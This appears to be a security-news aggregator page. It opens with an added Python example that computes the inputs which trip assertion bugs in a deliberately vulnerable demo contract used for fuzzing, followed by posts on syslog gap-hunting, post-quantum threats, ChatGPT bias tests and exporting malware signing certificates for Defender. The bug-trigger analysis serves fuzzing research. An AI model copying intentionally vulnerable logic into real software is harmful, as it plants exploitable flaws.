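As an added example (not code from the Trail of Bits post, nor from the Echidna or Optik code bases), the following Python mirrors the two bug conditions of VulnerableContract with Solidity's integer semantics, enumerates every int128 that trips each assertion, and measures how a purely random fuzzer fares against them, which puts a concrete number on the "impossible to find by random fuzzing" claim in "The problem" above. It also covers a pitfall in the one-line check shown for the 15032385536 input: Python's // floors while Solidity's / truncates toward zero, so that shortcut only agrees with the contract for non-negative values; for func_one's negative inputs the two disagree (-81 // 4 is -21 in Python but -20 in Solidity). The int128 bounds are taken from the contract's parameter type; the helper names, the seed and the trial counts are the example's own choices.

```python
# Added example, not code from the Trail of Bits post or from Echidna/Optik.
# Mirrors the two bug conditions of VulnerableContract with Solidity integer
# semantics (truncating division, arithmetic shift) so solver-found inputs can
# be checked offline, and measures how random int128 fuzzing fares against them.
import random

INT128_MIN = -(1 << 127)   # bounds follow the contract's int128 parameter type
INT128_MAX = (1 << 127) - 1


def sol_div(a: int, b: int) -> int:
    """Solidity's signed / truncates toward zero; Python's // floors.
    -81 / 4 is -20 in Solidity, but -81 // 4 == -21 in Python."""
    q = abs(a) // abs(b)
    return q if (a >= 0) == (b >= 0) else -q


def sol_sar(a: int, n: int) -> int:
    """Arithmetic right shift, as Solidity's >> on a signed intN.
    Python ints already shift arithmetically, so the built-in operator matches."""
    return a >> n


def func_one_triggers(x: int) -> bool:
    """True when func_one's assert(false) is reached: x / 4 == -20."""
    assert INT128_MIN <= x <= INT128_MAX
    return sol_div(x, 4) == -20


def func_two_triggers(x: int) -> bool:
    """True when func_two's assert(false) is reached: (x >> 30) / 7 == 2."""
    assert INT128_MIN <= x <= INT128_MAX
    return sol_div(sol_sar(x, 30), 7) == 2


def solve_func_one() -> list:
    """Every int128 that triggers func_one. Truncating division yields -20 only
    for -83..-80, so scanning a small window around -80 enumerates them all."""
    return [x for x in range(-90, -70) if func_one_triggers(x)]


def solve_func_two() -> tuple:
    """Inclusive range of x that triggers func_two: (x >> 30) / 7 == 2 holds
    iff 14 <= (x >> 30) <= 20, i.e. 14 * 2**30 <= x < 21 * 2**30."""
    return 14 << 30, (21 << 30) - 1


def random_fuzz(trials: int, seed: int = 0) -> int:
    """Count how many uniformly random int128 values hit either bug
    (a stand-in for a fuzzer that has no solver to lean on)."""
    rng = random.Random(seed)   # fixed seed keeps the run reproducible
    hits = 0
    for _ in range(trials):
        x = rng.randint(INT128_MIN, INT128_MAX)
        if func_one_triggers(x) or func_two_triggers(x):
            hits += 1
    return hits


def hit_probability() -> float:
    """Fraction of the int128 space that triggers at least one bug."""
    lo, hi = solve_func_two()
    return (len(solve_func_one()) + (hi - lo + 1)) / (1 << 128)


if __name__ == "__main__":
    print("func_one inputs:", solve_func_one())
    print("func_two range:", solve_func_two())
    print("15032385536 triggers func_two:", func_two_triggers(15032385536))
    print("random hits in 100000 trials:", random_fuzz(100_000))
    print("per-trial hit probability:", hit_probability())
```

The lower bound of the func_two range, 14 << 30, happens to be exactly the 15032385536 that Hybrid Echidna reported, which is the kind of value a constraint solver returns for a path condition like this; the per-trial probability (roughly 2e-29) is why the random runs come back with zero hits.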

Popular HR and Payroll Company Sequoia Discloses a Data Breach

Wired: Security - Thu, 2022/12/08 - 15:00
The company, which works with hundreds of startups, said it detected unauthorized access to personal data, including Social Security numbers.

Finding Gaps in Syslog - How to find when nothing happened, (Wed, Dec 7th)

SANS Internet Storm Center, InfoCON: green - Thu, 2022/12/08 - 14:41
I recently got a call from a client; they had an outage that required a firewall reboot, but couldn't give me an exact clock time. They were looking for anything in the logs just prior to that reboot that might indicate a carrier issue, as they had experienced a few outages like this recently. This was a Cisco ASA firewall, so we of course had logs - LOTS of logs - 2-4 GB per day, depending on the day, with dozens or more events per second, so way more than is practical to eyeball to find the "gap" in the logs that you'll see from a device reboot. What I needed was to find that gap so that I'd know where to look for problems (right before it). So how do we find "nothing happened" in a log file?

First, let's look at a typical log entry:

  2022-12-07 00:00:00	Local7.Info	172.16.200.1	Dec 07 2022 00:00:00: %ASA-6-302020: Built ....

So you can see we have a date/time stamp (from the syslog server), the syslog facility, the source IP, a date/time stamp (from the device), the message code (i.e. the Cisco-assigned identifier for this message type), then the message itself in text. The date and time of the first stamp are separated by a space, then there's a tab between that and the facility, and another tab between the facility and the source IP address. From there on everything is delimited by spaces.

Since I'm looking for a gap in the timestamps, I can just use that first field, so this gets easy! Let's use the "cut" command to parse out unique seconds:

  cat 172.016.200.001-2022-12-07.txt | cut -f 1 | sort | uniq > seconds.txt

If your syslog server is on Windows you'll likely use "type" instead of "cat". For a firewall this is too much information though: you'll usually have multiple events per second, so looking for a gap at that granularity will give you white-line fever in no time.

Let's leave off the seconds field and look for unique minutes instead:

  cat 172.016.200.001-2022-12-07.txt | cut -f 1 | cut -d ":" -f 1,2 | sort | uniq > minutes.txt

Note the two different uses of cut: the first one pulls the first field (delimited by a tab), which is the date+time. The second one uses the colon as its delimiter, so its first field is the date+hour and the second field is the minutes. Since the first timestamp is followed by a tab, which is cut's default delimiter, we don't need to tell the first cut command what delimiter to use. Log records should all be sequential, especially since we're parsing the timestamp from the syslog server, but I put a "sort" in there anyway, just on principle ("sort | uniq" is a string that should be stored in your fingers).

Since it was ~11am at the time, I took the "minutes.txt" file, opened it in notepad, went to the bottom and scrolled up a few, and found a gap almost right away of just over 1 hour, from 8:27 to 9:37. If the log covered a longer time period I might have dumped it into Excel and looked for non-sequential records with some cell math. Or you could use a PowerShell snippet like the one below.

First, create a header line and dump it to a file (note the tab characters `t). The header row gets really handy: it makes importing a delimited file way easier, as it auto-names the fields. This is also a handy thing to keep; if you are parsing these logs frequently, keeping various header files around is a time-saver:

  $header = "timestamp`tfacility`tsource_ip`tmessage"
  $header > import.txt

(If you are on Windows PowerShell 5.1 rather than PowerShell 7, write the header with Out-File -Encoding ascii instead of the > redirection: 5.1's redirection writes UTF-16, and the ANSI/UTF-8 log appended underneath it won't import cleanly.)

Next, shell out to a command prompt and append the syslog file to the header, for later import:

  cmd
  type fw.txt >> import.txt
  exit

Now import the file, using the tab ("`t") as the delimiter:

  $syslog = import-csv -Delimiter "`t" -path .\import.txt

Look at a record:

  $syslog[5]

  timestamp           facility    source_ip    message
  ---------           --------    ---------    -------
  2022-12-07 00:00:00 Local7.Info 172.16.200.1 Dec 07 2022 00:00:00: %ASA-6-305011: Built dynamic UDP translation from.

Perfect, let's process the file now:

  # Use the year value to verify each record
  $year = 2022
  # let's look for a minimum gap of 3 minutes
  $difference = 3
  # set an initial value for the "previous record" - cast the timestamp string to the "datetime" type
  $previous = [datetime]($syslog[0].timestamp)
  foreach ($record in $syslog.timestamp) {
      # only process properly formed records (that start with YYYY) - records that wrap with CRLF
      # leave short or garbage timestamp fields that would error out on the cast, so discard them here
      if ($record.length -ge 4 -and $record.substring(0,4) -eq $year) {
          $current = [datetime]($record)
          # totalminutes converts the days, hours, minutes etc of the difference to just minutes
          $gap = ($current - $previous).totalminutes
          if ($gap -ge $difference) {
              write-host $gap "minute gap identified between" $previous "and" $current
          }
          $previous = $current
      }
  }

When we run this, we get one line of output:

  70.05 minute gap identified between 12/7/2022 8:27:25 AM and 12/7/2022 9:37:28 AM

Perfect, just what I was looking for! Since they power cycled this box during the problem, I was looking for a ~4 minute gap (a typical boot time of an ASA firewall), then I was going to look at events immediately before that gap. But what I saw instead was 100% normal activity, followed by a 1 hour, 10 minute gap where no events happened, then normal activity again. So in this case no carrier issue - if the uplink was dead we'd have at least seen internal traffic trying to get out.

What was the problem? I'm suspecting a loose power cable or a flaky power supply, no definitive answer yet. This box is running the same OS as dozens of other ASAs I work with, and there are no OS-type errors, so it really does look like hardware. Plus this unit wasn't built as a redundant pair and this model doesn't have a redundant power supply - that's all getting fixed sometime soon!

Have you used a fun log forensics trick you can share? Especially if you have a handy script, or if the root cause was a letdown like this one? Please, use our comment form to share!

===============
Rob VandenBrink
rob@coherentsecurity.com (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
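As an added example (not from the diary, and not a port the author published), here is the same gap search in Python, for exports that are too big to scroll through in Notepad or for running as a scheduled check. It implements the same three steps the diary walks through: take the syslog server's stamp from the first tab-delimited field, discard wrapped continuation lines instead of letting them break the date conversion, and walk the sorted, de-duplicated stamps looking for a jump of at least N minutes. The log lines are constructed for the example in the layout the diary shows (they are not a real capture), and include one wrapped message and a 70-minute silence; the file name in the usage comment is the diary's, the threshold and helper names are the example's own.

```python
# Added example, not from the ISC diary. Finds silent periods in a syslog
# export laid out the way the diary describes, one record per line:
#   <syslog-server timestamp>\t<facility>\t<source ip>\t<device message>
import re
from datetime import datetime, timedelta
from typing import Iterable, List, Tuple

# Constructed sample (not a real log): normal traffic, one message that wrapped
# onto a second line, and a ~70 minute silence between 08:27:25 and 09:37:28.
SAMPLE_LOG = (
    "2022-12-07 08:27:10\tLocal7.Info\t172.16.200.1\tDec 07 2022 08:27:10: %ASA-6-302020: Built inbound ICMP connection\n"
    "2022-12-07 08:27:25\tLocal7.Info\t172.16.200.1\tDec 07 2022 08:27:25: %ASA-6-305011: Built dynamic UDP translation from\n"
    "inside:10.1.1.5/53621 to outside:203.0.113.9/53621\n"
    "2022-12-07 09:37:28\tLocal7.Notice\t172.16.200.1\tDec 07 2022 09:37:28: %ASA-5-111008: User 'enable_15' executed the 'show version' command\n"
    "2022-12-07 09:37:40\tLocal7.Info\t172.16.200.1\tDec 07 2022 09:37:40: %ASA-6-302013: Built outbound TCP connection\n"
    "2022-12-07 09:39:00\tLocal7.Info\t172.16.200.1\tDec 07 2022 09:39:00: %ASA-6-302014: Teardown TCP connection\n"
)

# The syslog server's stamp is the first tab-delimited field: YYYY-MM-DD HH:MM:SS
TS_RE = re.compile(r"^(\d{4})-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$")
TS_FMT = "%Y-%m-%d %H:%M:%S"


def parse_timestamps(lines: Iterable[str], year: int) -> List[datetime]:
    """Server-side timestamps of the well-formed records, in file order.
    Wrapped continuation lines (no tab, no leading stamp) and records whose
    year is not the expected one are dropped, like the YYYY check in the
    PowerShell version, instead of blowing up the datetime conversion."""
    stamps = []
    for line in lines:
        first = line.rstrip("\r\n").split("\t", 1)[0]
        m = TS_RE.match(first)
        if m is None or int(m.group(1)) != year:
            continue
        stamps.append(datetime.strptime(first, TS_FMT))
    return stamps


def unique_minutes(stamps: Iterable[datetime]) -> List[str]:
    """Same result as the shell pipeline cut -f 1 | cut -d ':' -f 1,2 | sort | uniq."""
    return sorted({s.strftime("%Y-%m-%d %H:%M") for s in stamps})


def find_gaps(stamps: Iterable[datetime], min_minutes: float) -> List[Tuple[datetime, datetime, float]]:
    """(previous, current, minutes) for each pair of consecutive records at
    least min_minutes apart. Records are sorted and de-duplicated first, the
    'sort | uniq' on principle, so an out-of-order export cannot fake a gap."""
    gaps = []
    ordered = sorted(set(stamps))
    for prev, cur in zip(ordered, ordered[1:]):
        minutes = (cur - prev) / timedelta(minutes=1)
        if minutes >= min_minutes:
            gaps.append((prev, cur, round(minutes, 2)))
    return gaps


if __name__ == "__main__":
    # Swap SAMPLE_LOG.splitlines() for open("172.016.200.001-2022-12-07.txt")
    # to run it over the real export (that file name is the one the diary uses).
    stamps = parse_timestamps(SAMPLE_LOG.splitlines(), 2022)
    for prev, cur, minutes in find_gaps(stamps, min_minutes=3):
        print(f"{minutes} minute gap identified between {prev} and {cur}")
```

Run against the sample it reports the single 70.05 minute gap; the 12-second and 80-second gaps around it stay below the 3-minute threshold, and the wrapped "inside:10.1.1.5/..." line never reaches the date parser.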

Elon Musk's Twitter Files Are a Feast for Conspiracy Theorists

Wired: Security - Thu, 2022/12/08 - 14:00
From QAnon influencers to @catturd, the very online right sees exactly what they want to see in the CEO's orchestrated disclosure.

What is Y2Q?

AlienVault Blogs - Thu, 2022/12/08 - 13:00
What is CRQC? Widespread interest in quantum computing continues to expand as computer innovators, scientists, and technology industry leaders vie to position themselves at the top of the pack for quantum computing prowess. As the buzz continues, I'd like to discuss Cryptographically Relevant Quantum Computers (CRQC) in simple terms. A CRQC uses quantum mechanical phenomena to quickly solve difficult mathematical problems that a classical computer cannot solve, or would take years to complete; if or when a CRQC is achieved, it will have the computational power to break today's public-key cryptography (RSA, Diffie-Hellman and elliptic-curve schemes, whose underlying factoring and discrete-logarithm problems fall to Shor's algorithm), leaving web-based digital communications compromised. One of the first lessons I learned from a cybersecurity architect is to never keep doing the same thing when it comes to cybersecurity. Cybersecurity practices should continually change according to evolving threats and vulnerabilities. Nonetheless, for the last 30-plus years the US has relied on public-key cryptography to secure digital data globally. With the arrival of a CRQC looming, the US is now in a race to replace a decades-old standard of encryption to protect vital data.

What is Y2Q? Years to Quantum (Y2Q) refers to the unknown number of years before there is a CRQC. Quantum systems are already in use, and select organizations provide cloud-based access to them for testing and research purposes; however, the quantum computers currently in use are not CRQCs. From this point forward we will refer to quantum systems that emerge post-Y2Q as CRQCs. As quantum computing evolves and the technology for a CRQC becomes reality, no single entity can pinpoint a precise date when a CRQC will make an impact on the world's IT infrastructure. Speculation ranges from five to 25 years, and various organizations have developed Y2Q countdown clocks, arbitrarily specifying date ranges up to 2034 as the deadline by which the world must upgrade its IT infrastructure to meet the Y2Q threat.

Conclusion

As the world awaits Y2Q, government entities and cybersecurity managers, along with the medical, telecom and banking industries, are generating playbooks, plans and contingencies to defend against CRQCs. While a CRQC will pose a considerable threat to enterprises in the future, a wide variety of contingencies are emerging to develop advanced solutions that alleviate the threat. While the full range of quantum computer applications steadily grows, it is nevertheless clear that America's continued technological and scientific leadership will depend on its ability to sustain a competitive advantage in quantum computing information and systems. Critical infrastructure, security protocols and internet banking, in addition to military and civilian communications, could be threatened. Is the United States postured to solidify its role as a world leader in its approach to Y2Q?

ChatGPT: "Bad hackers, male tennis players, and I don't know what ChatGPT is"

Un informático en el lado del mal - Thu, 2022/12/08 - 11:03
Today I felt like spending a little while trying out ChatGPT, the conversational model built on OpenAI. I wanted to look at some of the things I have talked to you about so many times regarding Artificial Intelligence, such as default gender bias, biased translations, or the view these models have of the hacker world. So this morning I got down to it.
Figure 1: ChatGPT: "Bad hackers, male tennis players, and I don't know what ChatGPT is"
The conversation I had was fairly long, in Spanish and in English, so I have pulled out some of the answers it gave to some very simple questions. As you will see, there is still a lot of educating to do if we want to put these AI models to work on tasks that affect people's lives.
On "hackers"
The first thing I asked about was hackers, to see what it would tell me about them, but already in the first question, when I wanted to know who the best hacker in the world is, it tells you that using "best" for something bad like being a "hacker" is a no-go.
Figure 2: We should not focus on who the best hacker is
In case there was any doubt, I also asked it in Spanish, to see whether in our language, where the term hacker has a positive meaning, it would treat hackers differently, but it seems to be dug in on that way of thinking.
Figure 3: The same; let's not focus on who the best hacker in the world is
Since I didn't like the answer, I asked it why it thinks that, and I explained the difference to it.
Figure 4: A hacker is not the same as a cybercriminal
Surprisingly, in its reply it agrees with me, so it seems it has no unified awareness or clear ideas, just answers picked for different questions. In other words, it might well not pass a psychometric test.
Default gender bias in sport
This is a basic test to detect whether a conversational AI model has a default gender bias. It consists of asking it for the best in a sport without saying whether male or female, and seeing whether or not it considers a multi-gender answer.
Figure 5: Best tennis players (male gender bias)
To make it clearer that it has a default gender bias, the tennis world makes it very easy, because we can ask who has the most Grand Slams, which is Serena Williams with 23, but we see that Roger Federer with 20 comes out. So it has a default gender bias and is out of date.
Figure 6: Default male gender bias, and out of date
It is enough to ask who won the last Roland Garros and see that it returns the 2021 result, so now you know roughly what date the training dataset has.
Figure 7: Data from 2021
A mere curiosity, to know what results to expect from the tests. And finally, since the hacker topic had left me feeling a bit "so-so", I pressed it.
Do you know who created ChatGPT?
I asked it whether it knew that ChatGPT had been created by great hackers, to see what it would say about that. And the result is that it has no information about ChatGPT; it is just a large language model trained by OpenAI.
Figure 8: Nothing comes up for ChatGPT
In the end, these AI models trained on massive data for conversation will be in our lives very soon. ChatGPT is a good way to try them out and see everything that still needs improving. Google and its LaMDA is going to be a platform to keep in mind in the future.
¡Saludos Malignos!
Author: Chema Alonso (Contact Chema Alonso)

ISC Stormcast For Thursday, December 8th, 2022 https://isc.sans.edu/podcastdetail.html?id=8282, (Thu, Dec 8th)

SANS Internet Storm Center, InfoCON: green - Thu, 2022/12/08 - 06:55
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark 4.0.2 and 3.6.10 released, (Wed, Dec 7th)

SANS Internet Storm Center, InfoCON: green - Thu, 2022/12/08 - 00:21
Wireshark has released updates for both the 3.6 and 4.0 lines. There appear to be quite a few bug fixes, but no vulnerability fixes.

[1] https://www.wireshark.org/docs/relnotes/wireshark-4.0.2.html
[2] https://www.wireshark.org/docs/relnotes/wireshark-3.6.10.html
[3] https://www.wireshark.org/download.html

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Extracting Certificates For Defender

Didier Stevens - Mon, 2022/12/05 - 02:00
A colleague asked me for help with extracting code signing certificates from malicious files, to add them to Defender's block list. The procedure involves right-clicking the EXE in Windows Explorer, selecting Properties to view the digital signature, and so on … But I don't like procedures where one has to click on malware. So I looked for a PowerShell command, and found this:

  Get-AuthenticodeSignature .\malware.exe.vir | Select-Object -ExpandProperty SignerCertificate | Export-Certificate -Type CERT -FilePath SignerCertificate.cer

Get-AuthenticodeSignature only parses the file's Authenticode signature; it never executes the sample. For a file that carries no signature, SignerCertificate is empty and nothing flows down the pipeline to Export-Certificate, so check the signature status first if you are scripting this over a batch of samples.

Rebooting

root labs rdist - Thu, 2022/11/17 - 22:59
I’ve recently had some time to catch up on reading and research. I’ve decided to start writing again here about cryptography, embedded systems, and security. Recently, I enjoyed being on the “Security, Cryptography, Whatever” podcast. I got a chance to cover some past projects and how the fields of cryptography and security have changed over the past 25 years.
  • Part 1 (1997 – 2007): Netscape, FIPS-140, Cryptography Research, satellite TV piracy wars, Blu-ray content protection wars
  • Part 2: (2008 – 2016): toll systems & smart meter hacking, designing a secure payment terminal (one of my favorite design projects), binary similarity analysis for app stores startup (SourceDNA), and the possible future of high assurance designs
I hope you enjoy hearing these stories as much as I did retelling them. More to come soon!

Healthcare Industry Leads the Way in Fixing Software Flaws

Zero in a bit - Thu, 2022/09/22 - 22:06
The healthcare industry is transforming patient care through software, from 24/7 digital patient portals, to AI-fueled medical research, and everything in between. As innovation reaches new heights, how does healthcare stack up against other sectors in terms of software security flaws and the ability to remediate them? Our latest State of Software Security Report found that 77 percent of applications in this sector have vulnerabilities – a slight uptick from last year’s 75 percent – with 21 percent considered high severity. Healthcare takes first place for fixing flaws at 27 percent. Developers in the space should be applauded for tackling complex authentication issues and insecure dependencies with success over the last 12 months. When clocking the time it takes to remediate flaws found by static analysis (SAST), dynamic analysis (DAST), and software composition analysis (SCA), healthcare organizations fall right in the middle of the pack. It’s also worth mentioning that healthcare…